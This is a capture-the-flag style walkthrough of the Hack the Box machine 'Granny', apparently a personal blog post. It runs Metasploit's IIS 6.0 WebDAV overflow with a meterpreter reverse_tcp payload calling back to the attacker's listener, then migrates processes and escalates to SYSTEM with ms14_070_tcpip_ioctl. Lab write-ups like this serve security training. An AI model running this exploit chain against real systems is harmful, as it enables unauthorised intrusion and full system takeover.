【Hack the Box】Granny - Walkthrough

#hackthebox #metasploit #granny #cybersecurity

From the HacktheBox

twitter:@ikk_hck

Enumeration

Anyway, nmap.

$ nmap -sC -sV -A -oA granny 10.10.10.15Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT

Here are the results.

# Nmap 7.91 scan initiated Sat May  8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15Nmap scan report for 10.10.10.15Host is up (0.19s latency).Not shown: 999 filtered portsPORT   STATE SERVICE VERSION80/tcp open  http    Microsoft IIS httpd 6.0| http-methods: |_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT|_http-server-header: Microsoft-IIS/6.0|_http-title: Error| http-webdav-scan: |   Server Type: Microsoft-IIS/6.0|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK|   WebDAV type: Unknown|_  Server Date: Sat, 08 May 2021 08:13:22 GMTService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat May  8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds

You can see that Microsoft IIS httpd 6.0 is working.
I'll look for it in Metasploit.

$ msfconsole     +-------------------------------------------------------+  |  METASPLOIT by Rapid7                                 |  +---------------------------+---------------------------+  |      __________________   |                           |  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |  |             )=\           | |  EXPLOIT   \            |  |            // \\          | |_____________\_______    |  |           //   \\         | |==[msf >]============\   |  |          //     \\        | |______________________\  |  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |  |        //         \\      |  *********************    |  +---------------------------+---------------------------+  |      o O o                |        \'\/\/\/'/         |  |              o O          |         )======(          |                                                       |                 o         |       .'  LOOT  '.        |                                                       | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                                       | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                                       | |________________|__|)__| |    |     __||_)     |     |                                                       | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                                       |  = = = = = = = = = = = =  |     '--------------'      |                                                       +---------------------------+---------------------------+                                                            =[ metasploit v6.0.40-dev                          ]+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]+ -- --=[ 8 evasion                                       ]Metasploit tip: Adapter names can be used for IP params set LHOST eth0msf6 > search iis 6.0Matching Modules================   #  Name                                                 Disclosure Date  Rank    Check  Description   -  ----                                                 ---------------  ----    -----  -----------   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl OverflowInteract with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

Exploit

I found it, set the ip address, etc. and ran it.

msf6 > use 2[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show optionsModule options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):                                              Name           Current Setting  Required  Description                                                           ----           ---------------  --------  -----------                                                           MAXPATHLENGTH  60               yes       End of physical path brute force                                      MINPATHLENGTH  3                yes       Start of physical path brute force                                    Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]          RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syn                                               tax 'file:<path>'                                                     RPORT          80               yes       The target port (TCP)                                                 SSL            false            no        Negotiate SSL/TLS for outgoing connections                            TARGETURI      /                yes       Path of IIS 6 web application   VHOST                           no        HTTP server virtual hostPayload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Microsoft Windows Server 2003 R2 SP2 x86msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15rhost => 10.10.10.15msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5lhost => 10.10.14.5msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check[+] 10.10.10.15:80 - The target is vulnerable.msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run[*] Started reverse TCP handler on 10.10.14.5:4444 [*] Trying path length 3 to 60 ...[*] Sending stage (175174 bytes) to 10.10.10.15[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700             meterpreter >

The intrusion was successful.

PE

meterpreter > getuid                                                                                            [-] stdapi_sys_config_getuid: Operation failed: Access is denied.

I try to check permissions, but I can't seem to even do that.
Let's check the process.

meterpreter > ps                                                                                                Process List                                                                                                    ============                                                                                                     PID   PPID  Name               Arch  Session  User                          Path ---   ----  ----               ----  -------  ----                          ---- 0     0     [System Process] 4     0     System 272   4     smss.exe 324   272   csrss.exe 348   272   winlogon.exe 396   348   services.exe 408   348   lsass.exe 596   396   svchost.exe 680   396   svchost.exe 736   396   svchost.exe 784   396   svchost.exe 800   396   svchost.exe 936   396   spoolsv.exe 964   396   msdtc.exe 1084  396   cisvc.exe 1124  396   svchost.exe 1180  396   inetinfo.exe 1216  396   svchost.exe 1332  396   VGAuthService.exe 1412  396   vmtoolsd.exe 1464  396   svchost.exe 1628  396   svchost.exe 1732  396   dllhost.exe 1816  396   alg.exe 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse                                                                             .exe 1900  396   dllhost.exe 2120  396   vssvc.exe 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.                                                                             exe 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcd                                                                             ata.exe 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe 2488  596   wmiprvse.exe

What's my process?

meterpreter > getpidCurrent pid: 2308

meterpreter > getpidCurrent pid: 2308

I see, it will move to one of the processes whose username is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > migrate 2244[*] Migrating from 2308 to 2244...[*] Migration completed successfully.

Then you check the user again, you will see that it is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > getuidServer username: NT AUTHORITY\NETWORK SERVICE

Return to the local terminal once to find a code that can be used for PE.

meterpreter > background[*] Backgrounding session 1...msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set session 1session => 1msf6 post(multi/recon/local_exploit_suggester) > run[*] 10.10.10.15 - Collecting local exploits for x86/windows...[*] 10.10.10.15 - 37 exploit checks are being tried...[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.[*] Post module execution completedmsf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/ms14_058_track_popup_menu) > show optionsModule options (exploit/windows/local/ms14_058_track_popup_menu):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SESSION                   yes       The session to run this module on.Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows x86msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1session => 1msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5lhost => 10.10.14.5msf6 exploit(windows/local/ms14_058_track_popup_menu) > run[*] Started reverse TCP handler on 10.10.14.5:4444 [*] Launching notepad to host the exploit...[+] Process 1824 launched.[*] Reflectively injecting the exploit DLL into 1824...[*] Injecting exploit into 1824...[*] Exploit injected. Injecting payload into 1824...[*] Payload injected. Executing exploit...[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Exploit completed, but no session was created.

I try to use "ms14_058_track_popup_menu", but it doesn't work.
Next, try to use "ms14_070_tcpip_ioctl".

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show optionsModule options (exploit/windows/local/ms14_070_tcpip_ioctl):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SESSION                   yes       The session to run this module on.Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows Server 2003 SP2msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1session => 1msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5lhost => 10.10.14.5msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run[*] Started reverse TCP handler on 10.10.14.5:4444 [*] Storing the shellcode in memory...[*] Triggering the vulnerability...[*] Checking privileges after exploitation...[+] Exploitation successful![*] Sending stage (175174 bytes) to 10.10.10.15[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

It seems to have succeeded, so I went ahead and checked the permissions and found that they are "NT AUTHORITY\SYSTEM".
Then, follow the steps below to explore and get the flag.

meterpreter > cd /meterpreter > lsListing: C:\============Mode              Size    Type  Last modified              Name----              ----    ----  -------------              ----40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpubmeterpreter > cd Documents\ and\ Settings meterpreter > lsListing: C:\Documents and Settings==================================Mode             Size  Type  Last modified              Name----             ----  ----  -------------              ----40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkServicemeterpreter > cd Administrator meterpreter > lsListing: C:\Documents and Settings\Administrator================================================Mode              Size    Type  Last modified              Name---------              ----    ----  -------------              ----40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.inimeterpreter > cd Desktop lmeterpreter > lsListing: C:\Documents and Settings\Administrator\Desktop========================================================Mode              Size  Type  Last modified              Name---------              ----  ----  -------------              ----100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt

incidentally

If you try to PE without changing it from the original process, you will get the following.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5lhost => 10.10.14.5msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1session => 1msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run[*] Started reverse TCP handler on 10.10.14.5:4444 [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.[*] Exploit completed, but no session was created.

Good night.